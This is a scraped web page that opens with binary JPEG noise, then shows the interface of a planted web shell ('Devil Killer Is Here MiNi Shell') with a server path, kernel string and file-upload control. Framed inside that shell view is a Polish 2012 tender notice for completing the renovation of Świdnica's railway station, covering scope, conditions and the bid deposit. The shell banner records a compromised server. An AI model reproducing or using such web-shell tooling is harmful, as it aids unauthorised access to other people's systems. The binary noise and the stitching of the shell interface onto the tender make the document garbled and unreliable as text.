JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121012/396794-N-2012.html

<p class="kh_header"><b>Świdnica: Wykonanie robót budowlanych polegających na: Dokończenie robót - Przebudowa i rewaloryzacja budynku dworca kolejowego w Świdnicy
realizowanych jako 1 część I etapu robót pn: Przebudowa i rewaloryzacja budynku dworca kolejowego i ul. Dworcowej w Świdnicy zadania pn:
Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy</b><br>
<b>Numer ogłoszenia: 396794 - 2012; data zamieszczenia: 12.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych polegających na: Dokończenie robót - Przebudowa i rewaloryzacja budynku dworca kolejowego w Świdnicy
realizowanych jako 1 część I etapu robót pn: Przebudowa i rewaloryzacja budynku dworca kolejowego i ul. Dworcowej w Świdnicy zadania pn:
Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa i rewaloryzacja budynku dworca kolejowego w Świdnicy; 
CPV:
45000000-7  Roboty budowlane
45300000-0  Roboty instalacyjne w budynkach
45330000-9  Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45310000-3  Roboty instalacyjne elektryczne
45315100-9  Instalacyjne roboty elektrotechniczne
45315600-4  Instalacje niskiego napięcia
45312100-8  Instalowanie przeciwpożarowych systemów alarmowych.

Przeznaczony do przebudowy budynek dworca PKP (wzniesiony w latach 1910 - 1920) wpisany jest do wojewódzkiej ewidencji zabytków i do ewidencji zabytków miasta Świdnica jako zespół kolejowy Świdnica Miasto. 

Inwestor 15.06.2012r. zawarł z Województwem Dolnośląskim umowę o dofinansowanie inwestycji Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy; w tym o dofinansowanie robót będących przedmiotem niniejszego postępowania dotyczącego dokończenia robót Przebudowy i rewaloryzacji budynku dworca kolejowego w Świdnicy, ze środków pomocowych w ramach RPO dla Województwa Dolnośląskiego na lata 2007-2013 w ramach priorytetu Rozwój infrastruktury transportowej na Dolnym Śląsku (Transport miejski i podmiejski).
2. Zakres przedmiotu zamówienia obejmuje wykonanie części robót budowlanych objętych decyzją o pozwoleniu na budowę dla Przebudowy i rewaloryzacji budynku dworca kolejowego i ul. Dworcowej w Świdnicy; a w szczególności:
2.1. Dokończenie przerwanej realizacji przebudowy i rewaloryzacji budynku dworca kolejowego, zgodnie ze sztuką budowlaną, ze specyfikacją techniczną wykonania i odbioru robót, z decyzją o pozwoleniu na budowę, z projektami budowlanym i wykonawczym, z inwentaryzacją robót pozostałych do wykonania (przedmiarem) w zakresie:
2.1.1. dokończenia robót ogólnobudowlanych kubaturowych polegających na:
- przebudowie i remoncie ścian w budynku,
- remoncie stropów i sufitów, 
- wykonaniu robót posadzkarskich,
- wykonaniu robót stolarskich,
- wykonaniu robót murowych,
- wymianie, remoncie lub rewaloryzacji wskazanej stolarki,
- rewaloryzacji dekoracyjnych elementów wewnętrznych ściennych i sufitowych,
- remoncie i rewaloryzacji zabytkowej elewacji budynku,
Uwaga: Dokończenie części robót (montaż posadzki w pomieszczeniach restauracyjnych na parterze budynku) nastąpi z materiału Zamawiającego ( klepka dębowa). 
2.1.2. dokończeniu robót instalacyjnych wod-kan-gaz-c.o. dla budynku dworca polegające na:
- wymianie wewnętrznych instalacji wody,
- wykonaniu wewnętrznych instalacji ppoż.,
- wymianie wewnętrznej kanalizacji sanitarnej,
- wykonaniu wewnętrznej instalacji gazu,
- wykonaniu lokalnej kotłowni gazowej w piwnicy budynku,
- wymianie instalacji c.o.,
- wykonaniu wentylacji grawitacyjnej i mechanicznej,
Uwaga: Większość instalacji została wykonana, instalacje wymagają dokończenia (zgodnie z przedmiarem) oraz sprawdzenia (brak jest protokołów badań i sprawdzeń instalacji, brak białego montażu i armatury). W kotłowni zamontowano główne urządzenia (dokończenie wg przedmiaru). Nie wykonano prób ani rozruchu instalacji c.o. ani urządzeń w kotłowni.
2.1.3. dokończeniu robót instalacji elektrycznych dla budynku dworca polegające na:
- wymianie wewnętrznych instalacji elektrycznych oświetlenia, siły i gniazd wtykowych,
- montażu instalacji oświetlenia awaryjnego i ewakuacyjnego,
- montażu instalacji oświetlenia zewnętrznego i instalacji ppoż.,
- montażu instalacji strukturalnych, systemu telewizji dozorowej i informacji pasażerskiej,
- wykonaniu systemu rozgłoszeniowego i przyzywowego,
- montażu instalacji odgromowych.
Uwaga: Większość instalacji została wykonana, instalacje wymagają dokończenia (zgodnie z przedmiarem) oraz sprawdzenia (brak jest protokołów badań i sprawdzeń instalacji, brak osprzętu elektrycznego, lampy częściowo zamontowane). Zamontowane urządzenia oświetlenia awaryjnego i ewakuacyjnego, instalacji ppoż., oraz zamontowane (do celów wykonania próby) lampy iluminacji budynku przeszły pozytywną próbę funkcjonalną. 

2.2. Wykonanie innych robót i prac niezbędnych dla należytego wykonania zamówienia, w tym:
- oznakowanie placu budowy, 
- organizacja zaplecza budowy zgodnie z punktem 6.1 SIWZ,
- organizacja dojść i dojazdów do posesji w trakcie prowadzenia robót,
- wywóz gruzu i innych materiałów nieużytecznych na składowisko odpadów (koszty składowania ponosi Wykonawca), uporządkowanie terenu budowy,
- opracowanie planu bezpieczeństwa i ochrony zdrowia BIOZ,
- uzgadnianie z projektantem i Konserwatorem Zabytków szczegółów prac renowacyjnych i konserwatorskich, zgodnie ze wskazaniem w projekcie budowlanym i wykonawczym w zakresie prac objętych dokończeniem,
- niezwłoczne zawiadomienie Zamawiającego o wszelkich zagrożeniach lub nowych okolicznościach wynikłych w trakcie prowadzenia robót, w tym prac i robót dotyczących zabytkowych elementów budynku.

2.3. Uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie budynku dworca (częściowego pozwolenia przed zakończeniem wszystkich robót objętych pozwoleniem na budowę). 

2.4. Przedmiotem niniejszego zamówienia nie jest budowa;
- ogrodzenia,
- dróg, placów, chodników (za wyjątkiem naprawy nawierzchni z kostki brukowej przy budynku w miejscu ułożenia instalacji i lamp do zewnętrznej iluminacji budynku),
- sieci wod-kan usytuowanych w drogach i placach,
choć wykonanie tych robót objęte jest decyzją o pozwoleniu na budowę dla Przebudowy i rewaloryzacji budynku dworca kolejowego i ul. Dworcowej w Świdnicy.

3. Ogólna charakterystyka przebudowywanego budynku:
Planowane roboty wykonane będą w zabytkowym budynku użyteczności publicznej wpisanym do gminnej i wojewódzkiej ewidencji zabytków, położonym w centrum Świdnicy. Budynek ma zróżnicowaną wysokość (2 lub 3 kondygnacje nadziemne + podpiwniczenie), wykonany jest w technologii tradycyjnej, więźba dachowa drewniana, dach stromy kryty dachówką.
Przebudowa nie zmienia formy architektonicznej budynku ani głównych parametrów (wysokości, szerokości, długości, geometrii dachów). W wyniku przebudowy zmienia się układ funkcjonalny pomieszczeń na poszczególnych kondygnacjach z zachowaniem podstawowej funkcji dworca na parterze.
Rewaloryzacja ma przywrócić pierwotną formę elewacji; dobudowane na elewacji elementy typu zadaszenia wejść winny być architektonicznie spójne z elementami wystroju architektonicznego elewacji. Rewaloryzacji podlega również zabytkowy hall dworca. Roboty na zabytkowych elementach budynku mogą być wykonywane pod nadzorem osób posiadających praktykę na budowie przy zabytkach nieruchomych. Na Wykonawcy spoczywa obowiązek bieżących konsultacji i roboczych uzgodnień z Wojewódzkim Konserwatorem Zabytków, przy udziale przedstawiciela Zamawiającego, w zakresie wskazanym w projekcie budowlanym i wykonawczym.
Zamierzenie budowlane pn. Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy podzielone zostało na 3 etapy realizacyjne. Przebudowa budynku dworca kolejowego jest częścią I etapu robót. W przebudowanym budynku dworca kolejowego zlokalizowane będą główne funkcje Centrum Przesiadkowego w Świdnicy. Realizacja 2 części etapu I, oraz etapów II i III budowy Centrum Przesiadkowego zlecona zostanie odrębnym postępowaniem przetargowym,.

4. Przedmiot zamówienia opisany w specyfikacji technicznej wykonania i odbioru robót, w projekcie budowlanym i w projekcie wykonawczym ; w zakresie dokończenia robót został uściślony w przedmiarze robót pozostałych do wykonania (nie wykonanych) oraz w przedmiarze robót koniecznych do wykonania w celu usunięcia usterek i niedoróbek robót wykonanych przez Integer S.A. obecnie w upadłości likwidacyjnej. Niniejsze zamówienie zostanie udzielone w celu dokończenia przebudowy budynku dworca kolejowego w zakresie realizacji robót budowlanych, wykonania prób, badań i sprawdzeń oraz uzyskania decyzji o pozwoleniu na użytkowanie budynku. W/w przedmiary robót sporządzone zostały na podstawie inwentaryzacji robót, wykonanej po wypowiedzeniu umowy o roboty budowlane Przebudowy i rewaloryzacji budynku dworca kolejowego w Świdnicy przez syndyka Integer S.A. w upadłości likwidacyjnej (wcześniejszego wykonawcy robót). Dokumentacja projektowa została opracowana przez Architektoniczną Pracownię Projektową s.c. A. Mikuła, B. Mikuła ze Świdnicy.

Projekt budowlany i wykonawczy, specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót stanowią załącznik do niniejszej specyfikacji i znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl w katalogu zamówienia publiczne. Dokumentacja projektowa w wersji papierowej jest do wglądu w siedzibie Zamawiającego - Urząd Miejski w Świdnicy, ul. Armii Krajowej nr 49, Referat Inwestycji - pok. 218. 

5. Gwarancja i rękojmia
Wykonawca udziela Zamawiającemu gwarancji jakości na okres 5 lat licząc od daty odbioru i przekazania do użytkowania budynku, na wszystkie prace budowlane zrealizowane od rozpoczęcia robót w 2010r. do ich zakończenia w ramach zadania Przebudowa i rewaloryzacja budynku dworca kolejowego w Świdnicy .
Wymagany okres rękojmi minimum 36 m-cy - na warunkach i zasadach określonych przepisami KC.

6. Warunki realizacji, odbioru i rozliczenia robót 

6.1 Warunki realizacji robót:
1/ Zamawiający zapewnia nadzór autorski i inwestorski zgodnie z warunkami pozwolenia na budowę.
2/ Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie kwalifikacje zawodowe i uprawnienia do kierowania robotami budowlanymi w odpowiednich specjalnościach, zgodnie z wymogami Prawa Budowlanego. 
Ze względu na zabytkowy charakter budynku dworca, Zamawiający wymaga, by prace konserwatorskie (prace sztukatorskie, konserwacja kamieniarki architektonicznej, konserwacja zabytkowych elementów stalowych, renowacja stolarki, renowacja hallu, ) prowadzone były przez osoby (pracowników i nadzór) posiadające praktykę na budowie przy zabytkach nieruchomych.
Za koordynację robót branżowych i prowadzenie dokumentacji budowy odpowiada Kierownik Budowy.
3/ Przedmiot zamówienia należy realizować zgodnie z umową, z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót, z normami uznanymi jako obowiązujące wg przepisów art.10 ustawy Prawo Budowlane, ze specyfikacją istotnych warunków zamówienia, zgodnie z przepisami BHP.
4/ Wszystkie użyte do budowy materiały muszą być nowe i odpowiadać parametrom podanym w projekcie, powinny posiadać odpowiedni atest i świadectwo dopuszczenia, wydane przez odpowiednie uprawnione instytucje, zezwalające na stosowanie ich w budownictwie. Dokumenty te przed wbudowaniem należy przedłożyć inspektorowi nadzoru inwestorskiego.
5/ Wykonawca zrealizuje własnym staraniem tymczasowe obiekty i urządzenia na terenie placu budowy: m.inn.: punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy. 
6/ Wykonawca będzie ponosił koszty organizacji terenu budowy, ogrodzenia, oznakowania i zagospodarowania zaplecza budowy, zużycia wody, energii elektrycznej i gazu (ogrzewania) w okresie realizacji robót, koszty utrzymania i konserwacji tymczasowych obiektów i urządzeń związanych z terenem budowy oraz inne nakłady nie stanowiące wartości robót budowlanych, a niezbędne do wykonania przedmiotu umowy. 
7 Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji robót w tym również wobec osób trzecich oraz w wyniku nieterminowego ich naprawienia.
8/ Koszty Wykonawcy, nie stanowiące wprost wartości robót budowlanych, a niezbędne do wykonania przedmiotu umowy (np. opisane w podpunktach 6/, 7/, 8/), stanowić będą koszty ogólne Wykonawcy i jako takie zostaną ujęte w cenie ofertowej Wykonawcy.
9/ W związku z uzyskaniem przez Zamawiającego dofinansowania inwestycji Budowa Centrum Przesiadkowego przy ul. Dworcowej i Kolejowej w Świdnicy ze środków UE w ramach RPO WD, Wykonawca zobowiązany jest do podjęcia wszelkich działań w tym organizacyjnych w celu zapewnienia terminowej realizacji przedmiotu zamówienia, oraz przestrzegania terminów uzgodnionych w harmonogramie rzeczowo-finansowym.
10/ W terminie do 7 dni kalendarzowych od daty podpisania umowy Wykonawca przedstawi Zamawiającemu do zaopiniowania harmonogram rzeczowo - finansowy robót. Zamawiający zaopiniuje harmonogram Wykonawcy w terminie 3 dni roboczych, a Wykonawca skoryguje go w terminie kolejnych 5 dni kalendarzowych. Uzgodniony harmonogram rzeczowo-finansowy stanowić będzie załącznik do umowy. 
11/ Zamawiający zachowuje prawo dostępu do terenu budowy dla wskazanych przez siebie innych wykonawców w celu prowadzenia np. robót zewnętrznych przy budynku (typu przebudowa sieci, nawierzchni dróg i placu, chodników, przebudowa oświetlenia zewnętrznego,) lub wewnętrznych typu montaż wyposażenia w budynku. 
12/ Wykonawca zobowiązany jest do przekazania odpadów z budowy na właściwe wysypisko odpadów. Koszt utylizacji odpadów obciąża Wykonawcę. 
13/ Szczegółowe warunki realizacji robót zawarto w projekcie umowy dołączonym do SIWZ.

6.2 Warunki odbioru robót:
1/ Wykonawca zgłasza do odbioru wszystkie roboty zanikowe.
2/ Z odbiorów częściowych robót będą każdorazowo sporządzane protokoły odbioru elementów wykonanych robót (protokoły stanu wykonanych robót). W odbiorach częściowych uczestniczą co najmniej: Kierownik Budowy, Kierownik robót podlegających odbiorowi i odpowiednio Inspektorzy Nadzoru Inwestorskiego.
3/ Przed zgłoszeniem gotowości do odbioru końcowego przedmiotu zamówienia, Wykonawca dostarcza Inspektorowi Nadzoru Inwestorskiego wszystkie wymagane dokumenty odbiorowe: dziennik budowy z wpisem kierownika budowy o zakończeniu wszystkich robót będących przedmiotem zamówienia potwierdzony ze strony Zamawiającego przez Inspektora Nadzoru, inwentaryzację powykonawczą, protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, atesty i aprobaty na wbudowane materiały. Niekompletna dokumentacja odbiorowa powodować będzie odmowę Zamawiającego do przystąpienia do czynności odbioru końcowego.
4/ Zamawiający przystąpi do czynności odbiorowych przedmiotu zamówienia w terminie do 10 dni roboczych od daty pisemnego zgłoszenia gotowości do odbioru robót, z zastrzeżeniem jak wyżej. Podstawą rozpoczęcia czynności odbioru końcowego będzie potwierdzenie Inspektora Nadzoru kompletności przekazanych mu przez Wykonawcę dokumentów odbiorowych. 
5/ Podstawą do podpisania przez Zamawiającego protokołu końcowego odbioru robót będzie wykonanie całego przedmiotu zamówienia. Zakończenie robót i zgłoszenie przez Wykonawcę gotowości do odbioru końcowego nastąpić winno w terminie gwarantującym możliwość zakończenia czynności odbiorowych i podpisania protokołu końcowego odbioru robót do 27.05.2013r.
6/ Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy i przekazania go Zamawiającemu, do uzyskiwania własnym staraniem decyzji o pozwoleniu na użytkowanie budynku (pozwolenia na częściowe użytkowanie inwestycji objętej pozwoleniem na budowę); w tym do wykonania ewentualnych zaleceń sformułowanych przez instytucje opiniujące zamiar przystąpienia do użytkowania budynku. Kierownik budowy i kierownicy robót będą uczestniczyć w kontrolach budowy przeprowadzanych przez uprawnione instytucje przed wydaniem decyzji o pozwoleniu na użytkowanie. budynku
7/ Szczegółowe warunki odbioru robót zgodnie z projektem umowy dołączonym do SIWZ.

6.3 Ogólne warunki rozliczenia robót:
1/ Za wykonanie przedmiotu zamówienia ustala się wynagrodzenie ryczałtowe zgodne z ceną ofertową Wykonawcy i z dołączonym do oferty zestawieniem elementów rozliczeniowych (wykazem cen).
Cena ofertowa Wykonawcy uwzględnia wszystkie koszty wynikające z obowiązków Wykonawcy określonych w niniejszej specyfikacji, w tym również opisanych w części III pkt 2.2, pkt 6.1.9 SIWZ i w projekcie umowy.
2/ Podatek VAT naliczany będzie w wysokości obowiązującej w dniu wystawienia faktury VAT.
3/ Wykonane roboty rozliczane będą w okresach miesięcznych na podstawie faktur przejściowych i faktury końcowej. Wartość faktur przejściowych nie może przekroczyć 80 % ryczałtowego wynagrodzenia umownego. Do każdej faktury Wykonawca dołączy protokół potwierdzający wykonanie robót, podpisany przez Inspektora nadzoru, oraz dokumenty potwierdzające dokonanie przez Wykonawcę zapłaty za roboty wykonane przez podwykonawców, pod rygorem nie przyjęcia faktury.
Faktura końcowa może być wystawiona po zakończeniu robót, końcowym odbiorze robót przez Zamawiającego oraz uzyskaniu decyzji o pozwoleniu na czesiowe użytkowanie inwestycji (budynku).
4/ Termin płatności faktur ustala się do 30 dni od daty dostarczenia Zamawiającemu faktur łącznie z wymaganymi załącznikami.
5/ Szczegółowe warunki dotyczące rozliczenia robót zawarte są w projekcie umowy dołączonym do SIWZ.

7. Informacje dodatkowe
W sytuacji rażącego zaniedbania Wykonawcy skutkującego :
1/ utratą przyznanego dofinansowania ze środków pomocowych w ramach RPO; 
2/ degradacją wykonanych już robót przez brak ogrzewania budynku w sezonie zimowym,
Zamawiający ma prawo odstąpić od umowy, powierzyć wykonanie przedmiotu umowy innemu podmiotowi na koszt Wykonawcy, oraz żądać od Wykonawcy właściwego odszkodowania.
3/ Szczegółowe warunki dotyczące odstąpienia od umowy zawarte są w projekcie umowy dołączonym do SIWZ.
IV.  WYMAGANY TERMIN WYKONANIA ZAMÓWIENIA:

1. Zamawiający wyznacza terminy wykonania zamówienia:
a/ protokolarne przekazanie placu budowy nastąpi w dniu podpisania umowy.
b/ rozpoczęcie realizacji:  nie później niż w terminie 7 dni kalendarzowych od daty przekazania placu budowy,
c/ zakończenie realizacji: w terminie do 27.05.2013r.; rozumiane jako data uzyskania pozwolenia na częściowe użytkowanie inwestycji, 
d/ w terminie do 1 miesiąca od daty podpisania umowy Zamawiający żąda dokończenia robót wewnętrznych instalacji elektrycznych w zakresie pozwalającym na podłączenie docelowego zasilania budynku przez Tauron dla docelowego zasilenia w energię elektryczną urządzeń w kotłowni, 
e/ w terminie do 1 miesiąca od daty podpisania umowy Zamawiający żąda dokończenia robót instalacji c.o. i w kotłowni w zakresie pozwalającym Wykonawcy na uruchomienie kotłowni i podania ciepła technologicznego w pomieszczeniach budynku dworca, celem prowadzenia prac w obiekcie ogrzewanym.
2. Terminy przejściowe wykonania poszczególnych elementów robót będą obowiązywać wg ustaleń dokonanych przez strony w harmonogramie rzeczowo-finansowym realizacji zamówienia pod rygorem kar umownych, z zastrzeżeniem jak w punkcie 1 lit. d/ i e/ 
Uzgodniony harmonogram rzeczowo - finansowy stanowić będzie załącznik do umowy o realizację niniejszego zamówienia publicznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-9, 45.31.00.00-3, 45.31.51.00-9, 45.31.56.00-4, 45.31.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta powinna być zabezpieczona wadium w wysokości: 45.000,00 zł (słownie: czterdzieści pięć tysięcy złotych 00/100).
Wadium winno zostać wniesione przed upływem terminu składania ofert, tj przed 30-10-2012 r. przed godz. 09:00.
2. Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Prawo Zamówień Publicznych, z tym, że:
a) złożone w pieniądzu:
- przelewem na rachunek bankowy Zamawiającego w Banku PKO. S.A. I Oddział  w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
b) złożone w gwarancjach (bankowych , ubezpieczeniowych):
- z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych art. 46 ust. 5 ustawy pzp tj. w przypadku, gdy Wykonawca:
; odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
; nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony za potwierdzeniem, przed upływem terminu składania ofert. 
d) W przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art. 23 ustawy pzp.
3. Dowód przelewu lub potwierdzenie depozytu należy dołączyć w oryginale do oferty (w przypadku przelewu kserokopię odcinka D).
4. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą.
Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
5. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem jak w p-cie 8.
6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
7. Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8 Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
d) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
